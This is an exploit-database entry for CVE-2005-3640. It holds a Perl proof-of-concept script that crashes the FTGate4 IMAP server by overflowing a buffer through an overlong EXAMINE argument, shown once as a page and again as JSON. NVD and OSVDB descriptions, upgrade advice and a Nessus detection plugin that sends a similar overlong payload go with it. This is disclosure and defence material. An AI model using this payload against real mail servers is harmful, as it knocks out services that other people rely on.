Search...

FTGate4 Groupware Mail Server 4.1 imapd Remote Buffer Overflow PoC

2005-11-16T00:00:00

ID EDB-ID:1327
Type exploitdb
Reporter Luca Ercoli
Modified 2005-11-16T00:00:00

Description

FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC. CVE-2005-3640. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl

use IO::Socket;

print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n";
print "http://www.lucaercoli.it\n\n\n";

$host = "localhost";

$remote = IO::Socket::INET-&gt;new ( Proto =&gt; "tcp",
PeerAddr =&gt; $host,
PeerPort =&gt; "143",
);

unless ($remote) { die "Can't connect to $host" }

print "[!] Connected\n";
print "[?] Exploiting...\n";

sleep(1);

my $imapd = join ("", "1 login user pass", "\r\n");

print $remote $imapd;

sleep(1);
my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n");
print $remote $imapd;
sleep(1);
my $imapd = join ("","C"x(11305), "\r\n");
print $remote $imapd;

print "\n[!] Done\n\n\n";

close $remote;

# milw0rm.com [2005-11-16]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:1327", "hash": "cc830f35e5e464a14fb6bdf23eee212c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FTGate4 Groupware Mail Server 4.1 imapd Remote Buffer Overflow PoC", "description": "FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC. CVE-2005-3640. Dos exploit for windows platform", "published": "2005-11-16T00:00:00", "modified": "2005-11-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/1327/", "reporter": "Luca Ercoli", "references": [], "cvelist": ["CVE-2005-3640"], "lastseen": "2016-01-31T14:00:38", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3640"]}, {"type": "osvdb", "idList": ["OSVDB:20917"]}, {"type": "nessus", "idList": ["FTGATE_OVERFLOW.NASL"]}], "modified": "2016-01-31T14:00:38"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1327/", "sourceData": "#!/usr/bin/perl\n\nuse IO::Socket;\n\nprint \"\\nFTGate Imapd BufferOverrun\\nLuca Ercoli io\\@lucaercoli.it\\n\";\nprint \"http://www.lucaercoli.it\\n\\n\\n\";\n\n$host = \"localhost\";\n\n$remote = IO::Socket::INET->new ( Proto => \"tcp\",\nPeerAddr => $host,\nPeerPort => \"143\",\n);\n\nunless ($remote) { die \"Can't connect to $host\" }\n\nprint \"[!] Connected\\n\";\nprint \"[?] Exploiting...\\n\";\n\nsleep(1);\n\nmy $imapd = join (\"\", \"1 login user pass\", \"\\r\\n\");\n\nprint $remote $imapd;\n\nsleep(1);\nmy $imapd = join (\"\", \"1 EXAMINE \", \"B\"x(224), \"\\r\\n\");\nprint $remote $imapd;\nsleep(1);\nmy $imapd = join (\"\",\"C\"x(11305), \"\\r\\n\");\nprint $remote $imapd;\n\nprint \"\\n[!] Done\\n\\n\\n\";\n\nclose $remote;\n\n# milw0rm.com [2005-11-16]\n", "osvdbidlist": ["20917"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-07-11T11:15:02", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in the IMAP Groupware Mail server of Floosietek FTGate (FTGate4) 4.1 allow remote attackers to execute arbitrary code via long arguments to various IMAP commands, as demonstrated with the EXAMINE command.", "modified": "2017-07-10T21:33:15", "published": "2005-11-16T16:22:00", "id": "CVE-2005-3640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3640", "title": "CVE-2005-3640", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in FTGate4. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to the IMAP EXAMINE command, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 4.4.004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in FTGate4. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to the IMAP EXAMINE command, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.floosietek.com/\n[Secunia Advisory ID:17609](https://secuniaresearch.flexerasoftware.com/advisories/17609/)\nOther Advisory URL: http://www.lucaercoli.it/advs/FTGate4.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0213.html\nISS X-Force ID: 23101\nGeneric Exploit URL: http://www.securiteam.com/windowsntfocus/6T00O0AELI.html\n[CVE-2005-3640](https://vulners.com/cve/CVE-2005-3640)\n", "modified": "2005-11-16T14:03:07", "published": "2005-11-16T14:03:07", "href": "https://vulners.com/osvdb/OSVDB:20917", "id": "OSVDB:20917", "title": "FTGate4 IMAP EXAMINE Command Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:51", "bulletinFamily": "scanner", "description": "The remote host appears to be running a version of FTGate, a commercial groupware mail server for Windows from FTGate Technology Ltd. \n\nThe version of FTGate installed on the remote host includes an IMAP server that is prone to a buffer overflow attack due to boundary errors in its handling of various IMAP commands. An authenticated attacker can exploit this issue to crash the application itself and possibly to execute arbitrary code subject to the privileges of the SYSTEM user.", "modified": "2018-11-15T00:00:00", "id": "FTGATE_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20221", "published": "2005-11-17T00:00:00", "title": "FTGate4 IMAP EXAMINE Command Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20221);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2005-3640\");\n script_bugtraq_id(15449);\n\n script_name(english:\"FTGate4 IMAP EXAMINE Command Remote Overflow\");\n script_summary(english:\"Checks for buffer overflow vulnerability in FTGate IMAP server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IMAP server is prone to a buffer overflow.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of FTGate, a\ncommercial groupware mail server for Windows from FTGate Technology\nLtd. \n\nThe version of FTGate installed on the remote host includes an IMAP\nserver that is prone to a buffer overflow attack due to boundary\nerrors in its handling of various IMAP commands. An authenticated\nattacker can exploit this issue to crash the application itself and\npossibly to execute arbitrary code subject to the privileges of the\nSYSTEM user.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/416876/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://members.ftgate.com/f4/topic.asp?TOPIC_ID=7298\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FTGate 4.4.002 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/11/17\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"find_service1.nasl\", \"imap_overflow.nasl\");\n script_require_keys(\"imap/login\", \"imap/password\");\n script_exclude_keys(\"imap/false_imap\", \"imap/overflow\");\n script_require_ports(\"Services/imap\", 143);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_service(svc: \"imap\", default: 143, exit_on_fail: 1);\nif (get_kb_item(\"imap/\"+port+\"/false_imap\")) exit(0);\n\n\nuser = get_kb_item(\"imap/login\");\npass = get_kb_item(\"imap/password\");\nif (!user || !pass) {\n exit(0, \"imap/login and/or imap/password are empty\");\n}\n\n\n# Establish a connection.\ntag = 0;\nsoc = open_sock_tcp(port);\nif (!soc) exit(1, \"Cannot connect to TCP port \"+port+\".\");\n\n\n# Read banner and make sure it looks like FTGate's.\ns = recv_line(socket:soc, length:1024);\nif (\n !strlen(s) || \n \"* OK IMAP4 IMAP4rev1 Server\" >!< s\n) {\n close(soc);\n exit(0);\n}\n\n\n# Try to log in.\n++tag;\nresp = NULL;\nc = string(\"nessus\", string(tag), \" LOGIN \", user, \" \", pass);\nsend(socket:soc, data:string(c, \"\\r\\n\"));\nwhile (s = recv_line(socket:soc, length:1024)) {\n s = chomp(s);\n m = eregmatch(pattern:string(\"^nessus\", string(tag), \" (OK|BAD|NO)\"), string:s, icase:TRUE);\n if (!isnull(m)) {\n resp = m[1];\n break;\n }\n}\n\n\n# If successful, try to exploit the flaw.\nif (resp && resp =~ \"OK\") {\n ++tag;\n resp = NULL;\n c = string(\"nessus\", string(tag), \" EXAMINE \", crap(500));\n send(socket:soc, data:string(c, \"\\r\\n\"));\n while (s = recv_line(socket:soc, length:1024)) {\n s = chomp(s);\n m = eregmatch(pattern:string(\"^nessus\", string(tag), \" (OK|BAD|NO)\"), string:s, icase:TRUE);\n if (!isnull(m)) {\n resp = m[1];\n break;\n }\n }\n\n # If we didn't get a response, try to send a NOOP just to make sure it's down.\n if (isnull(resp)) {\n # Check if the daemon is hung.\n ++tag;\n resp = NULL;\n c = string(\"nessus\", string(tag), \" NOOP\");\n send(socket:soc, data:string(c, \"\\r\\n\"));\n while (s = recv_line(socket:soc, length:1024)) {\n s = chomp(s);\n m = eregmatch(pattern:string(\"^nessus\", string(tag), \" (OK|BAD|NO)\"), string:s, icase:TRUE);\n if (!isnull(m)) {\n resp = m[1];\n break;\n }\n }\n if (isnull(resp)) {\n security_hole(port);\n exit(0);\n }\n }\n}\nelse if (resp =~ \"NO\") {\n debug_print(\"couldn't login with supplied IMAP credentials!\", level:1);\n}\n\n\n# Logout.\n++tag;\nresp = NULL;\nc = string(\"nessus\", string(tag), \" LOGOUT\");\nsend(socket:soc, data:string(c, \"\\r\\n\"));\nwhile (s = recv_line(socket:soc, length:1024)) {\n s = chomp(s);\n m = eregmatch(pattern:string(\"^nessus\", string(tag), \" (OK|BAD|NO)\"), string:s, icase:TRUE);\n if (!isnull(m)) {\n resp = m[1];\n break;\n }\n}\nclose(soc);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}